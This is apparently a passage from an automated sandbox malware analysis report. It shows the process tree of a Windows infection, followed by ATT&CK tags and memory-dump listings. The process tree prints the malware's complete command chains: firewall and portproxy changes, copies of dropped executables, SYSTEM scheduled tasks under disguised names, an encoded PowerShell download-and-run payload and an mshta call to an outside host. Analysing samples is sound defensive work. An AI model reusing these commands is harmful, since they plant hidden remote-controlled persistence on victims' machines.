      "C:\Windows\System32\cmd.exe" /c echo VSQi >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\sUBhFuFA.exe&move /y c:\windows\temp\dig.exe c:\windows\Gvwyq.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\QcLTY" /tr "c:\windows\Gvwyq.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\Gvwyq.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\sUBhFuFA.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:2144
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2608
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2436
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2580
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2640
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\QcLTY" /tr "c:\windows\Gvwyq.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2872
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo fNEsuOU >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\sUBhFuFA.exe&move /y c:\windows\temp\dig.exe c:\windows\Gvwyq.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\uJoTYp" /tr "c:\windows\Gvwyq.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\Gvwyq.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\sUBhFuFA.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:1668
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2936
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1200
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2584
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn sUBhFuFA /tr "C:\Windows\sUBhFuFA.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:680
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\uJoTYp" /tr "c:\windows\Gvwyq.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1556

C:\Windows\fUHQAmUc.exe
C:\Windows\fUHQAmUc.exe
1⤵
PID:2420

C:\Windows\HHlwNCjJ.exe
C:\Windows\HHlwNCjJ.exe
1⤵
PID:2632

C:\Windows\system32\taskeng.exe
taskeng.exe {28484007-237B-4893-9417-C8F2B328DCB3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2344
- C:\Windows\sUBhFuFA.exe
  C:\Windows\sUBhFuFA.exe
  2⤵
  - Executes dropped EXE
  PID:2980
- - C:\Windows\sUBhFuFA.exe
    C:\Windows\sUBhFuFA.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1984
- C:\Windows\caHBLfKm.exe
  C:\Windows\caHBLfKm.exe
  2⤵
  - Executes dropped EXE
  PID:3032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1032-6-0x00000000760D1000-0x00000000760D3000-memory.dmp

Filesize
8KB

Download
memory/2012-55-0x0000000001F90000-0x0000000001F91000-memory.dmp

Filesize
4KB

Download
memory/2012-64-0x000000001A890000-0x000000001A891000-memory.dmp

Filesize
4KB

Download
memory/2012-59-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/2012-60-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/2012-62-0x000000001B700000-0x000000001B701000-memory.dmp

Filesize
4KB

Download
memory/2012-57-0x000000001A940000-0x000000001A942000-memory.dmp

Filesize
8KB

Download
memory/2012-56-0x000000001AB60000-0x000000001AB61000-memory.dmp

Filesize
4KB

Download
memory/2012-63-0x000000001A94A000-0x000000001A969000-memory.dmp

Filesize
124KB

Download
memory/2012-58-0x000000001A944000-0x000000001A946000-memory.dmp

Filesize
8KB

Download
memory/2012-53-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp

Filesize
8KB

Download
memory/2012-54-0x000007FEF5300000-0x000007FEF5CEC000-memory.dmp

Filesize
9.9MB

Download